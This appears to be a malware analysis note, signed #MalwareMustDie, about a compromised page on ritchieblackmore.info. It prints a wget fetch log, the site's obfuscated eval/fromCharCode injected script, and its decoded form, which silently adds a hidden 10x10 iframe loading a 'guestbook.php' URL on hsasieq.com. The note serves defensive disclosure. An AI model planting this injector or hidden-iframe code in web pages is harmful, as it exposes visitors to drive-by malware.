ritchieblackmore.info injected by fake malware guestbook url

1. //Source of Infection: h00p://ritchieblackmore.info/minstrel/guitarb.html
2. //Up & Alive PoC:
3. --19:49:32-- h00p://ritchieblackmore.info/minstrel/guitarb.html
4. => `./sample'
5. Connecting to 192.168.7.11:8118... connected.
6. Proxy request sent, awaiting response... 301 Moved Permanently
7. Location: http://www.ritchieblackmore.info/minstrel/guitarb.html [following]
8. --19:49:39-- h00p://www.ritchieblackmore.info/minstrel/guitarb.html
9. => `./sample'
10. Connecting to 192.168.7.11:8118... connected.
11. Proxy request sent, awaiting response... 200 OK
12. Length: 5,978 (5.8K) [text/html]
13. 19:49:47 (14.42 KB/s) - `./sample' saved [5978/5978]
14. // -----------------------------------------------------------------------------;
15. //obfs found:
16. <script type='text/javascript'>win=window;gar=win['String'];ga='l';g=win['eva'+ga];sf=gar.fromCharCode;g(sf(4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,60.5*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2,49*2,50*2,60.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,59.5*2,57*2,52.5*2,58*2,50.5*2,20*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,52*2,57.5*2,48.5*2,57.5*2,52.5*2,50.5*2,56.5*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,51.5*2,58.5*2,50.5*2,57.5*2,58*2,49*2,55.5*2,55.5*2,53.5*2,23*2,56*2,52*2,56*2,31.5*2,58*2,56*2,30.5*2,51*2,28.5*2,25.5*2,51*2,25*2,24.5*2,28*2,25*2,51*2,28*2,49.5*2,25.5*2,26.5*2,24.5*2,27*2,27*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,51*2,58.5*2,55*2,49.5*2,58*2,52.5*2,55.5*2,55*2,16*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,52*2,57.5*2,48.5*2,57.5*2,52.5*2,50.5*2,56.5*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,51.5*2,58.5*2,50.5*2,57.5*2,58*2,49*2,55.5*2,55.5*2,53.5*2,23*2,56*2,52*2,56*2,31.5*2,58*2,56*2,30.5*2,51*2,28.5*2,25.5*2,51*2,25*2,24.5*2,28*2,25*2,51*2,28*2,49.5*2,25.5*2,26.5*2,24.5*2,27*2,27*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,29.5*2,6.5*2,5*2,4.5*2,62.5*2))</script>
17.  
18. //------------------------------------------------------------------------------;
19. // deobfs here
20. //
21. if (document.getElementsByTagName('body')[0]){
22. iframer();
23. }
24. else {
25. var bdy = document.createElement("body");
26. try {
27. document.appendChild(bdy);
28. }
29. catch (e){
30. document.body = bdy;
31. }
32. if (document.getElementsByTagName('body')[0]){
33. iframer();
34. }
35. else {
36. document.write("
37. <iframe src='http://hsasieq.com/guestbook.php?tp=f93f2182f8c35166' width='10' height='10'
38. style='visibility: hidden;'></iframe>");
39. }
40. }
41. function iframer(){
42. document.getElementsByTagName('body')[0].innerHTML += "
43. <iframe src='http://hsasieq.com/guestbook.php?tp=f93f2182f8c35166' width='10' height='10'
44. style='visibility: hidden;'></iframe>";
45. }
46.  
47. /////// #MalwareMustDie